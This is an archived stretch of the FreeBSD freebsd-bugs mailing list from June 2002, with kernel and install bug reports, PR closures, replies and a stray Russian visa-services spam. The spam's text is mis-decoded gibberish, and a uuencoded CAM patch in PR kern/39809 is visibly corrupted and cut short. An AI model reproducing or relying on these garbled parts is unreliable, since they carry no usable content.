[2002/06/23] docs/39757 doc Clarification for remote MX sendmail expl o [2002/06/24] ports/39766 ports Update port: japanese/zipcodes to 2002050 o [2002/06/24] ports/39771 ports update security/p5-Crypt-SSLeay to 0.39 o [2002/06/24] misc/39772 pccardd is slow to install a PCCARD. o [2002/06/24] ports/39774 ports [UPDATE]: x11-wm/bbpager o [2002/06/24] ports/39777 ports New port: security/libsectok o [2002/06/24] ports/39778 ports New port: security/sectok o [2002/06/24] ports/39779 ports Remove port: graphics/miniscrib o [2002/06/24] ports/39785 ports Maintainer Update: emulators/hercules (mi o [2002/06/24] misc/39787 T/TCP support o [2002/06/24] ports/39789 ports Update port: irc/pisg o [2002/06/24] ports/39790 ports ${PERL} -> ${REINPLACE_CMD} o [2002/06/24] ports/39791 ports ${PERL} -> ${REINPLACE_CMD} o [2002/06/24] ports/39792 ports ${PERL} -> ${REINPLACE_CMD} o [2002/06/24] ports/39793 gnome Fix gnome-- on -CURRENT o [2002/06/24] ports/39794 ports ${PERL} -> ${REINPLACE_CMD} o [2002/06/24] ports/39795 ports strip -> ${STRIP_CMD} 2392 problems total. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Mon Jun 24 11:20:12 2002 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id C348C37B401 for ; Mon, 24 Jun 2002 11:20:01 -0700 (PDT) Received: (from gnats@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5OIK1Q85334; Mon, 24 Jun 2002 11:20:01 -0700 (PDT) (envelope-from gnats) Received: from nwww.freebsd.org (www.FreeBSD.org [216.136.204.117]) by hub.freebsd.org (Postfix) with ESMTP id CCBAA37B4B4 for ; Mon, 24 Jun 2002 11:09:04 -0700 (PDT) Received: from www.freebsd.org (localhost [127.0.0.1]) by nwww.freebsd.org (8.12.2/8.12.2) with ESMTP id g5OI94hG001478 for ; Mon, 24 Jun 2002 11:09:04 -0700 (PDT) (envelope-from nobody@www.freebsd.org) Received: (from nobody@localhost) by www.freebsd.org (8.12.2/8.12.2/Submit) id g5OI94DO001477; Mon, 24 Jun 2002 11:09:04 -0700 (PDT) Message-Id: <200206241809.g5OI94DO001477@www.freebsd.org> Date: Mon, 24 Jun 2002 11:09:04 -0700 (PDT) From: Bruce Miller To: freebsd-gnats-submit@FreeBSD.org X-Send-Pr-Version: www-1.0 Subject: misc/39797: Problems Installing v4.4 on Intel Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org >Number: 39797 >Category: misc >Synopsis: Problems Installing v4.4 on Intel >Confidential: no >Severity: critical >Priority: medium >Responsible: freebsd-bugs >State: open >Quarter: >Keywords: >Date-Required: >Class: sw-bug >Submitter-Id: current-users >Arrival-Date: Mon Jun 24 11:20:01 PDT 2002 >Closed-Date: >Last-Modified: >Originator: Bruce Miller >Release: 4.4 >Organization: >Environment: >Description: I▓m having problems installing FreeBSD to my Intel machine. Doing the CD install, I got through everything fine, fdisk etc, wrote all the file system information successfully, started the emergency shell on tty4, then gave me: "Error mounting /dev/acd0c on /dist: No such file for directory" I tried the floppy install and got: "Error mounting floppy fd0 (/dev/fd0) on /dist: No such file for directory " Where can I get help on this. Thanks in advance. Bruce >How-To-Repeat: >Fix: >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Mon Jun 24 12:18:28 2002 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 317DF37B400; Mon, 24 Jun 2002 12:18:25 -0700 (PDT) Received: (from robert@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5OJIOG95439; Mon, 24 Jun 2002 12:18:24 -0700 (PDT) (envelope-from robert) Date: Mon, 24 Jun 2002 12:18:24 -0700 (PDT) From: Message-Id: <200206241918.g5OJIOG95439@freefall.freebsd.org> To: slw@fine.pu.ru, robert@FreeBSD.org, freebsd-bugs@FreeBSD.org Subject: Re: kern/38285: Memory leak in kernel (proc-args) Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Synopsis: Memory leak in kernel (proc-args) State-Changed-From-To: open->closed State-Changed-By: robert State-Changed-When: Mon Jun 24 11:59:34 PDT 2002 State-Changed-Why: The bug was fixed in -current. http://www.freebsd.org/cgi/query-pr.cgi?pr=38285 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Mon Jun 24 12:33:53 2002 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 836CA37B403; Mon, 24 Jun 2002 12:33:42 -0700 (PDT) Received: (from robert@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5OJXgU97329; Mon, 24 Jun 2002 12:33:42 -0700 (PDT) (envelope-from robert) Date: Mon, 24 Jun 2002 12:33:42 -0700 (PDT) From: Message-Id: <200206241933.g5OJXgU97329@freefall.freebsd.org> To: bsdmail@rhoda.fsworld.co.uk, robert@FreeBSD.org, freebsd-bugs@FreeBSD.org Subject: Re: misc/38721: HPT372 fixes have not propagated down to 4-stable Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Synopsis: HPT372 fixes have not propagated down to 4-stable State-Changed-From-To: open->closed State-Changed-By: robert State-Changed-When: Mon Jun 24 12:32:59 PDT 2002 State-Changed-Why: The missing changes were integrated into -stable. http://www.freebsd.org/cgi/query-pr.cgi?pr=38721 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Mon Jun 24 13:20:27 2002 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id EB54237B407 for ; Mon, 24 Jun 2002 13:20:04 -0700 (PDT) Received: (from gnats@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5OKK4Z06061; Mon, 24 Jun 2002 13:20:04 -0700 (PDT) (envelope-from gnats) Received: from nwww.freebsd.org (www.FreeBSD.org [216.136.204.117]) by hub.freebsd.org (Postfix) with ESMTP id 7BB1F37B400 for ; Mon, 24 Jun 2002 13:18:03 -0700 (PDT) Received: from www.freebsd.org (localhost [127.0.0.1]) by nwww.freebsd.org (8.12.2/8.12.2) with ESMTP id g5OKI3hG016439 for ; Mon, 24 Jun 2002 13:18:03 -0700 (PDT) (envelope-from nobody@www.freebsd.org) Received: (from nobody@localhost) by www.freebsd.org (8.12.2/8.12.2/Submit) id g5OKI35o016438; Mon, 24 Jun 2002 13:18:03 -0700 (PDT) Message-Id: <200206242018.g5OKI35o016438@www.freebsd.org> Date: Mon, 24 Jun 2002 13:18:03 -0700 (PDT) From: Greg Quinlan To: freebsd-gnats-submit@FreeBSD.org X-Send-Pr-Version: www-1.0 Subject: i386/39802: iBCS2 emulation fork process core dumps Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org >Number: 39802 >Category: i386 >Synopsis: iBCS2 emulation fork process core dumps >Confidential: no >Severity: serious >Priority: medium >Responsible: freebsd-bugs >State: open >Quarter: >Keywords: >Date-Required: >Class: sw-bug >Submitter-Id: current-users >Arrival-Date: Mon Jun 24 13:20:04 PDT 2002 >Closed-Date: >Last-Modified: >Originator: Greg Quinlan >Release: 4.6-Stable >Organization: >Environment: 4.6-Stable >Description: Using iBCS2 emulation ONLY with IBCS2 Binaries ONLY; Any iBCS2 (COFF/SCO) binary which forks a process (child process) will get the next PID (ranging from X to 99999, see /sys/sys/proc.h), but most iBCS2 binaries have an upper PID limit of around 32700 (short int). So after the PID count exceeds this value, the program will crash (core dump). It may give an error of 'can't fork process' or similar. >How-To-Repeat: The problem will not reproduce itself until the current PID reaches around 32700 which may not happen for some time after a boot or reboot. Wait for the PID number to exceed 'short int', and for an iBCS2 program to fork a child process. >Fix: - Modify the /sys/sys/proc.h change PID_MAX from 99999 to a safe value of 32759, and also change NO_PID from 100000 to a safe value of 32760. - Remake the kernel & reboot. This should be included as a WARNING in the documentation for IBCS2 emulation. Or modified automatically if the option for iBCS2 is included in the /etc/rc.conf file. >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Mon Jun 24 14: 0:33 2002 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 3DE7037B426 for ; Mon, 24 Jun 2002 14:00:06 -0700 (PDT) Received: (from gnats@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5OL06O10044; Mon, 24 Jun 2002 14:00:06 -0700 (PDT) (envelope-from gnats) Received: from hirsch.in-berlin.de (hirsch.in-berlin.de [192.109.42.6]) by hub.freebsd.org (Postfix) with ESMTP id 2BAF937B401 for ; Mon, 24 Jun 2002 13:55:07 -0700 (PDT) Received: from hirsch.in-berlin.de (localhost [127.0.0.1]) by hirsch.in-berlin.de (8.12.1/8.12.1/Debian -2) with ESMTP id g5OKt1pq005240 (version=TLSv1/SSLv3 cipher=EDH-RSA-DES-CBC3-SHA bits=168 verify=NOT) for ; Mon, 24 Jun 2002 22:55:02 +0200 Received: (from uucp@localhost) by hirsch.in-berlin.de (8.12.1/8.12.1/Debian -2) with UUCP id g5OKt11I005234 for FreeBSD-gnats-submit@freebsd.org; Mon, 24 Jun 2002 22:55:01 +0200 Received: (from ripley@localhost) by server.nostromo.in-berlin.de (8.9.3/8.9.3) id WAA87813; Mon, 24 Jun 2002 22:50:56 +0200 (CEST) (envelope-from ripley) Message-Id: <200206242050.WAA87813@server.nostromo.in-berlin.de> Date: Mon, 24 Jun 2002 22:50:56 +0200 (CEST) From: "H. Eckert" Reply-To: ripley@nostromo.in-berlin.de To: FreeBSD-gnats-submit@FreeBSD.org X-Send-Pr-Version: 3.2 Subject: kern/39805: 4.6R install panics with umass0 device connected Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org >Number: 39805 >Category: kern >Synopsis: 4.6R install panics with umass0 device connected >Confidential: no >Severity: serious >Priority: medium >Responsible: freebsd-bugs >State: open >Quarter: >Keywords: >Date-Required: >Class: sw-bug >Submitter-Id: current-users >Arrival-Date: Mon Jun 24 14:00:05 PDT 2002 >Closed-Date: >Last-Modified: >Originator: H. Eckert >Release: FreeBSD 4.6-RELEASE >Organization: Individual Network Berlin e.V. >Environment: ASUS A7N266-C mainboard with AMD Athlon XP 2000+, Dazzle 6in1 internally connected multimedia drive for Compact Flash, Smart Media, etc. storage cards. The device reports as follows: umass0: SCM Microsystems Inc. TARGA 6in1 reader, rev. 1.10/5.07. addr 2 >Description: With lots of delay after the ATAPI CD drives, the umass0 driver reports umass0: Invalid CSW: tag 0 should be 13. Sysinstall shows "Probing devices, please wait" and the kernel panics with panic: integer divide fault >How-To-Repeat: Insert 4.6 CD in my machine and boot it. >Fix: Physically disconnect the drive or disable USB in BIOS. Probably inserting a CF or similar card into the drive could work too, but unfortunatly I don't have any for the time being. >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Mon Jun 24 14: 9:45 2002 Delivered-To: freebsd-bugs@freebsd.org Received: from eamail1-out.unisys.com (eamail1-out.unisys.com [192.61.61.99]) by hub.freebsd.org (Postfix) with ESMTP id 8A8DE37B429; Mon, 24 Jun 2002 14:09:33 -0700 (PDT) Received: from us-ea-gtwy-6.ea.unisys.com (us-ea-gtwy-6.ea.unisys.com [192.61.146.102]) by eamail1-out.unisys.com (8.9.3/8.9.3) with ESMTP id VAA25218; Mon, 24 Jun 2002 21:07:30 GMT Received: by us-ea-gtwy-6.ea.unisys.com with Internet Mail Service (5.5.2655.55) id ; Mon, 24 Jun 2002 16:09:31 -0500 Message-ID: <3FAD1088D4556046AEC48D80B47B478C1FA529@usslc-exch-4.slc.unisys.com> From: "Van Maren, Kevin" To: "'FreeBSD-gnats-submit@FreeBSD.org'" , "'freebsd-bugs@FreeBSD.org'" Subject: RE: conf/39537: External ThinkPad 240 cdrom does not work Date: Mon, 24 Jun 2002 16:09:50 -0500 MIME-Version: 1.0 X-Mailer: Internet Mail Service (5.5.2655.55) Content-Type: text/plain; charset="iso-8859-1" Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org It appears that the problem with the INQUIRY is caused by quirkiness with the cable: if I move the CDROM drive it works fine. Kevin To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Mon Jun 24 14:10:25 2002 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 244BE37B408 for ; Mon, 24 Jun 2002 14:10:07 -0700 (PDT) Received: (from gnats@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5OLA7v15197; Mon, 24 Jun 2002 14:10:07 -0700 (PDT) (envelope-from gnats) Date: Mon, 24 Jun 2002 14:10:07 -0700 (PDT) Message-Id: <200206242110.g5OLA7v15197@freefall.freebsd.org> To: freebsd-bugs@FreeBSD.org Cc: From: "Van Maren, Kevin" Subject: RE: conf/39537: External ThinkPad 240 cdrom does not work Reply-To: "Van Maren, Kevin" Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org The following reply was made to PR conf/39537; it has been noted by GNATS. From: "Van Maren, Kevin" To: "'FreeBSD-gnats-submit@FreeBSD.org'" , "'freebsd-bugs@FreeBSD.org'" Cc: Subject: RE: conf/39537: External ThinkPad 240 cdrom does not work Date: Mon, 24 Jun 2002 16:09:50 -0500 It appears that the problem with the INQUIRY is caused by quirkiness with the cable: if I move the CDROM drive it works fine. Kevin To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Mon Jun 24 14:19: 1 2002 Delivered-To: freebsd-bugs@freebsd.org Received: from gnome02.net.rol.ru (gnome02.net.rol.ru [194.67.1.180]) by hub.freebsd.org (Postfix) with ESMTP id 2DC5237B400; Mon, 24 Jun 2002 14:18:53 -0700 (PDT) Received: from ts18-a246.Moscow.dial.rol.ru ([195.239.5.246]:8719 "HELO Sender" ident: "TIMEDOUT" whoson: "-unregistered-" smtp-auth: TLS-CIPHER: TLS-PEER: ) by gnome02.net.rol.ru with SMTP id ; Tue, 25 Jun 2002 00:24:30 +0400 From: VISA <3exvisa@email.ru> To: "" <> Subject: оюяонпрмн-бхгнбше сяксцх Reply-To: evsnew@email.ru X-Mailer: The Bat! (v1.52f) Business X-Priority: 3 X-MSMail-Priority: Normal Mime-Version: 1.0 Content-Type: text/plain; charset="Windows-1251" Date: Tue, 25 Jun 2002 00:25:45 +0400 Message-Id: <20020624202430Z3303860-14399+9817@gnome02.net.rol.ru> Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org йНЛОЮМХЪ "щЙЯОПЕЯЯ бХГЮ яЕПБХЯ" ОПЕДКЮЦЮЕР: опхцкюьемхъ дкъ хмнярпюммшу цпюфдюм б пняяхч нТНПЛКЕМХЕ ОПХЦКЮЬЕМХИ: нДМНЙПЮРМНЕ МЮ 1 ЛЕЯЪЖ - $ 25 лМНЦНЙПЮРМНЕ МЮ 1 ЦНД - $ 150 *оПЮБНБШЕ БНОПНЯШ НРМНЯХРЕКЭМН ОПЕАШБЮМХЪ ХМНЯРПЮММШУ ЦПЮФДЮМ МЮ РЕППХРНПХХ пт. нтнплкемхе бшегдмшу бхг пняяхъмюл - цЕПЛЮМХЪ - тПЮМЖХЪ - юМЦКХЪ - ьБЕИЖЮПХЪ - хРЮКХЪ Х ЛМНФЕЯРБН ДПСЦХУ ЯРПЮМ... оПЕДЯРЮБКЕМХЕ бЮЬХУ ХМРЕПЕЯНБ Б ЙНМЯСКЭЯРБЮУ лНЯЙБШ. нтнплкемхе гюцпюмоюяонпрнб (жЕМШ СЙЮГЮМШ ДКЪ ФХРЕКЕИ лНЯЙБШ Х лНЯЙ. НАКЮЯРХ) 35 ПЮА.ДМЕИ - $70 21-23 ПЮА.ДМЕИ - $140 15-17 ПЮА.ДМЕИ - $180 10-12 ПЮА.ДМЕИ - $260 оН бЮЬЕЛС ГЮОПНЯС БШЬКЕЛ ЙНЛОКЕЙР МЕНАУНДХЛШУ ДНЙСЛЕМРНБ ДКЪ НТНПЛКЕМХЪ ГЮЦПЮМОЮЯОНПРЮ. аеяокюрмши бшегд йспэепю й бюл б нтхя б опедекюу Ц. лняйбш рЕК./ТЮЙЯ: (095) 107-78-58,797-04-08, 797-04-82 ------------------------ оПХМНЯХЛ ЯБНХ ХГБХМЕМХЪ ЕЯКХ ЩРН ОХЯЭЛН МЕ НЙЮГЮКНЯЭ ДКЪ бЮЯ ОНКЕГМШЛ. вРНАШ НРЙЮГЮРЭЯЪ НР ПЮЯЯШКЙХ МЮОХЬХРЕ ОХЯЭЛН МЮ ЮДПЕЯ: delete@email.ru To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Mon Jun 24 16: 1:29 2002 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id F25F537B405 for ; Mon, 24 Jun 2002 16:00:03 -0700 (PDT) Received: (from gnats@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5ON03X32890; Mon, 24 Jun 2002 16:00:03 -0700 (PDT) (envelope-from gnats) Received: from mta6.snfc21.pbi.net (mta6.snfc21.pbi.net [206.13.28.240]) by hub.freebsd.org (Postfix) with ESMTP id D304737B41D for ; Mon, 24 Jun 2002 15:56:14 -0700 (PDT) Received: from root.org ([63.195.111.155]) by mta6.snfc21.pbi.net (iPlanet Messaging Server 5.1 (built May 7 2001)) with ESMTP id <0GY8001HDFPJAL@mta6.snfc21.pbi.net> for FreeBSD-gnats-submit@freebsd.org; Mon, 24 Jun 2002 15:56:13 -0700 (PDT) Received: (from nate@localhost) by moe (8.12.3/8.12.3/Submit) id g5OMZfG5000273; Mon, 24 Jun 2002 15:35:41 -0700 (PDT) Message-Id: <200206242235.g5OMZfG5000273@moe> Date: Mon, 24 Jun 2002 15:35:41 -0700 (PDT) From: Nate Lawson Reply-To: Nate To: FreeBSD-gnats-submit@FreeBSD.org X-Send-Pr-Version: 3.113 Subject: kern/39809: PATCH: remove cam_extend array usage Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org >Number: 39809 >Category: kern >Synopsis: PATCH: remove cam_extend array usage >Confidential: no >Severity: non-critical >Priority: low >Responsible: freebsd-bugs >State: open >Quarter: >Keywords: >Date-Required: >Class: change-request >Submitter-Id: current-users >Arrival-Date: Mon Jun 24 16:00:03 PDT 2002 >Closed-Date: >Last-Modified: >Originator: Nate Lawson >Release: FreeBSD 5.0-CURRENT i386 >Organization: >Environment: System: FreeBSD moe 5.0-CURRENT FreeBSD 5.0-CURRENT #0: Mon Jun 17 12:37:57 PDT 2002 nate@moe:/usr/src/sys/i386/compile/MOE i386 >Description: Here's a patch that removes all usage of the cam_extend array. With it, cam_extend.[ch] can be removed. It has been moderately tested against scsi_da but should be tested with scsi_sa to make sure it got all the alias devices. >How-To-Repeat: Use the patch. >Fix: begin 644 extend-remove.patch M+2TM('-C'1E;F0N:#X* M("-I;F-L=61E(#QC86TO8V%M7W!E'!T7W!EPHM"0EP6YC(&-A;&QB86-K'1E;F1?PH@"0ED:7-K7V1E M2!Q=6ER:W,N"B`)("HO"D!`("TV,C,L.2`K-C$P+#$P($!`"B`) M("`)"2`@1$564U1!5%]"4U]53D%604E,04),12P*(`D)"2`@1$564U1!5%]4 M65!%7T-$4D]-('P@1$564U1!5%]465!%7TE&7U-#4TDL"B`)"0D@($1%5E-4 M051?4%))3U))5%E?0T0I.PHM"61I6YC(&-A;&QB86-K('-O('1H M870@=V4@9V5T"D!`("TX-S4L,3(@*S@V,RPQ,"!`0`H@"7-TPH@"0EB:6]F:6YI2`R,2`Q M,CHQ-3HR-R`R,#`R"D!`("TX,BPW("LX,BPV($!`"B`*("-I;F-L=61E(#QC M86TO8V%M+F@^"B`C:6YC;'5D92`\8V%M+V-A;5]C8V(N:#X*+2-I;F-L=61E M(#QC86TO8V%M7V5X=&5N9"YH/@H@(VEN8VQU9&4@/&-A;2]C86U?<&5R:7!H M+F@^"B`C:6YC;'5D92`\8V%M+V-A;5]X<'1?<&5R:7!H+F@^"B`C:6YC;'5D M92`\8V%M+V-A;5]D96)U9RYH/@I`0"`M,C(W+#@@*S(R-BPV($!`"B`)+RH@ M9FQA9W,@*B\),"P*('T["B`*+7-T871I8R!S=')U8W0@97AT96YD7V%R'1E;F0@87)R87D@9F]R('-T;W)I;F<@=&AE M(&1E=FEC97,@=V4@871T86-H('1O+@HM"2`J+PHM"6-H<&5R:7!H'1E;F1?;F5W*"D["BT):68@*&-H<&5R:7!H'1E;F0@87)R87DA7&XB M*3L*+0D)2@F5]D978H M'!T7W!R:6YT7W!A=&@H<&5R:7!H M+3YP871H*3L*(`EP5QN(BD[ M"B`)9G)E92AS;V9T8RP@35]$159"548I.PI`0"`M,S@T+#<@*S,W,2PV($!` M"B`)8GIEF5O9B@J2`Q.2`R M,3HU.3HR."`R,#`R"BLK*R!S8W-I7V1A+F,)5'5E($UA>2`R,2`Q,CHR,CHT M,R`R,#`R"D!`("TV,"PW("LV,"PV($!`"B`*("-I;F-L=61E(#QC86TO8V%M M+F@^"B`C:6YC;'5D92`\8V%M+V-A;5]C8V(N:#X*+2-I;F-L=61E(#QC86TO M8V%M7V5X=&5N9"YH/@H@(VEN8VQU9&4@/&-A;2]C86U?<&5R:7!H+F@^"B`C M:6YC;'5D92`\8V%M+V-A;5]X<'1?<&5R:7!H+F@^"B`*0$`@+30X-"PW("LT M.#,L-B!`0`H@'1E;F1?87)R87D@*F1A<&5R:7!H"AS*3L*(`D)PH@"7-T'1E M;F1?9V5T*&1A<&5R:7!HPH@"7-T2!F;W(@2%<;B(I.PHM"0ER971U2!Q=6ER:W,N"D!`("TQ,30Y+#8@*S$Q,C0L-R!` M0`H@"2`J+PH@"7-O9G1C+3YD978@/2!D:7-K7V-R96%T92AP97)I<&@M/G5N M:71?;G5M8F5R+"`F6YC(&-A;&QB86-K'1E;F1?87)R87D@*G!A M'1E;F1?;F5W*"D["BT):68@*'!A2%<;B(I.PHM"0ER971U6YC(&-A;&QB86-K+B`@5&AIPH@"0EX<'1?<')I;G1?<&%T:"AP97)I<&@M/G!A M=&@I.PH@"0EP5QN(BD["D!` M("TS,#,L-R`K,C@Y+#8@0$`*(`ES;V9T8RT^<&1?='EP92`](%-)1%]465!% M*"9C9V0M/FEN<5]D871A*3L*(`H@"7!E6YC(&-A;&QB M86-K('-O('1H870@=V4@9V5T"D!`("TS-#8L,3<@*S,S,BPQ,B!`0`H@>PH@ M"7-T"!T:&ES("HO"BT)=6YI="`](&UI;F]R*&1E=BD@)B`P>&9F.PHM"BT) M<&5R:7!H(#T@8V%M7V5X=&5N9%]G970H<&%S"!T:&ES("HO"BT)=6YI="`](&UI M;F]R*&1E=BD@)B`P>&9F.PHM"BT)<&5R:7!H(#T@8V%M7V5X=&5N9%]G970H M<&%SPHM M"7-T"!T:&ES("HO"BT) M=6YI="`](&UI;F]R*&1E=BD@)B`P>&9F.PHM"BT)<&5R:7!H(#T@8V%M7V5X M=&5N9%]G970H<&%S'1E;F1?87)R87D@*G!T<&5R:7!H'1E M;F1?9V5T*'!T<&5R:7!HPH@"0EB:6]F:6YIPHM"0EP2@F M'1E;F1?9V5T*'!T<&5R:7!H2`R,2`Q,CHS.#HT-"`R,#`R"D!`("TU,BPW("LU M,BPV($!`"B`*("-I;F-L=61E(#QC86TO8V%M+F@^"B`C:6YC;'5D92`\8V%M M+V-A;5]C8V(N:#X*+2-I;F-L=61E(#QC86TO8V%M7V5X=&5N9"YH/@H@(VEN M8VQU9&4@/&-A;2]C86U?<&5R:7!H+F@^"B`C:6YC;'5D92`\8V%M+V-A;5]X M<'1?<&5R:7!H+F@^"B`C:6YC;'5D92`\8V%M+V-A;5]D96)U9RYH/@I`0"`M M-#,W+#@@*S0S-BPV($!`"B`)+RH@9FQA9W,@*B\)1%]405!%+`H@?3L*(`HM M'1E;F1?87)R87D@*G-A<&5R:7!HPH@"7-T'1E;F1?9V5T*'-A<&5R:7!H M'1E;F1?9V5T*'-A<&5R:7!HPHM M"0EP'!T7W!R:6YT M7W!A=&@H<&5R:7!H+3YP871H*3L*(`EP5QN(BD["B`)9G)E92AS;V9T8RP@35]$159"548I.PI`0"`M,30S M."PW("LQ-#(S+#8@0$`*(`H@"6)I;W%?:6YI="@F'1E;F1?2`R,2`Q,CHQ-3HR-R`R,#`R"D!`("TS.2PW("LS.2PV M($!`"B`*("-I;F-L=61E(#QC86TO8V%M+F@^"B`C:6YC;'5D92`\8V%M+V-A M;5]C8V(N:#X*+2-I;F-L=61E(#QC86TO8V%M7V5X=&5N9"YH/@H@(VEN8VQU M9&4@/&-A;2]C86U?<&5R:7!H+F@^"B`C:6YC;'5D92`\8V%M+V-A;5]X<'1? M<&5R:7!H+F@^"B`C:6YC;'5D92`\8V%M+V-A;5]D96)U9RYH/@I`0"`M,3DQ M+#<@*S$Y,"PV($!`"B`)+RH@<'-I>F4@*B\);F]P2!F;W(@PHM"0EP2%<;B(I.PHM M"0ER971U6YC(&-A;&QB86-K+B`@5&AI'1E;F1?"AS*3L*(`D)PH@"7-T'1E;F0N M:#X*("-I;F-L=61E(#QC86TO8V%M7W!E'1E;F0N:#X*("-I;F-L=61E(#QC86TO8V%M7W!E'1E;F0@87)R87D@9F]R('-T;W)I M;F<@=&AE(&1E=FEC97,@=V4@871T86-H('1O+@HM"2`J+PHM"71APHM"0EP'1E M;F0@87)R87DA7&XB*3L*+0D)PI` M0"`M-#PH@"61E9F%U;'0Z"B`)"2\J($9!3$Q42%)/ M54=(("HO"D!`("TU-34L,3D@*S4T,BPQ-B!`0`H@>PH@"7-T7,@'1E;F1?9V5T*'1A2!S=7!P;W)T960@;W!E'1E;F1?9V5T*'1A2!S=7!P;W)T960@;W!E'1E;F1?9V5T*'1APH@"7-TPH@"0EB:6]F:6YIRelease-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Mon Jun 24 17:10: 9 2002 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 4710B37B401 for ; Mon, 24 Jun 2002 17:10:03 -0700 (PDT) Received: (from gnats@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5P0A3l48077; Mon, 24 Jun 2002 17:10:03 -0700 (PDT) (envelope-from gnats) Date: Mon, 24 Jun 2002 17:10:03 -0700 (PDT) Message-Id: <200206250010.g5P0A3l48077@freefall.freebsd.org> To: freebsd-bugs@FreeBSD.org Cc: From: Cyrille Lefevre Subject: Re: kern/39681: hidden kernel boot tunables added to sysctl as read-only mib Reply-To: Cyrille Lefevre Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org The following reply was made to PR kern/39681; it has been noted by GNATS. From: Cyrille Lefevre To: Bruce Evans Cc: FreeBSD-gnats-submit@FreeBSD.ORG Subject: Re: kern/39681: hidden kernel boot tunables added to sysctl as read-only mib Date: Tue, 25 Jun 2002 02:09:31 +0200 On Sun, Jun 23, 2002 at 04:42:09PM +1000, Bruce Evans wrote: > On Sun, 23 Jun 2002, Cyrille Lefevre wrote: [snip] > > +SYSCTL_QUAD(_kern, OID_AUTO, maxtsiz, CTLFLAG_RD, > > + &maxtsiz, 0, "Max text size"); > > +SYSCTL_QUAD(_kern, OID_AUTO, dfldsiz, CTLFLAG_RD, > > + &dfldsiz, 0, "Initial max data size"); > > +SYSCTL_QUAD(_kern, OID_AUTO, maxdsiz, CTLFLAG_RD, > > + 